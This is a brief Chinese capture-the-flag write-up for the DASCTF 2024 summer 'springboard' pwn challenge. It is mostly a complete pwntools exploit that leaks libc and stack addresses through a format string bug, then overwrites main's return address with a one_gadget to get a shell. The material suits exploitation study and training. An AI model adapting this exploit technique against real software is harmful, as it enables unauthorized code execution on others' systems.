2024DASCTF夏季PWN

Posted on

springboard

格式化字符串漏洞,且字符串不在栈上的类型:

通过任意地址写,将main函数的ret addr改为one gadget即可。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
from pwn import *


def stack_write(p: process, stack_base, offset, value):
    assert 0 <= (stack_base & 0xFFFF) + offset < 0x10000 and value < 0x10000

    payload1 = b""
    payload1 += f"%{(stack_base + offset) & 0xffff}c%11$hn".encode("ascii")
    p.sendlineafter(b"Please enter a keyword\n", payload1 + b"\x00")

    payload2 = b""
    payload2 += f"%{value & 0xffff}c%39$hn".encode("ascii")
    p.sendlineafter(b"Please enter a keyword\n", payload2 + b"\x00")


def main():
    context.log_level = "debug"
    p = process("./pwn")
    libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
    one_gadgets = [0xE3B04, 0xE3AFE, 0xE3B01]

    payload1 = b"%9$p,%11$p,\x00"
    p.sendlineafter(b"Please enter a keyword\n", payload1)
    data = int(p.recvuntil(",", drop=True).decode("ascii"), 16)
    libc.address = data - 0x24083
    print(f"[+] libc {hex(libc.address)}")

    data = int(p.recvuntil(",", drop=True).decode("ascii"), 16)
    stack_ = data - 0x108
    print("[*] ", f"stack_ = {hex(stack_)}")

    # gdb.attach(p)
    # pause()
    og = libc.address + one_gadgets[2]
    stack_write(p, stack_, 0x18 + 0, (og >> 0) & 0xFFFF)
    stack_write(p, stack_, 0x18 + 2, (og >> 16) & 0xFFFF)
    p.interactive()


if __name__ == "__main__":
    main()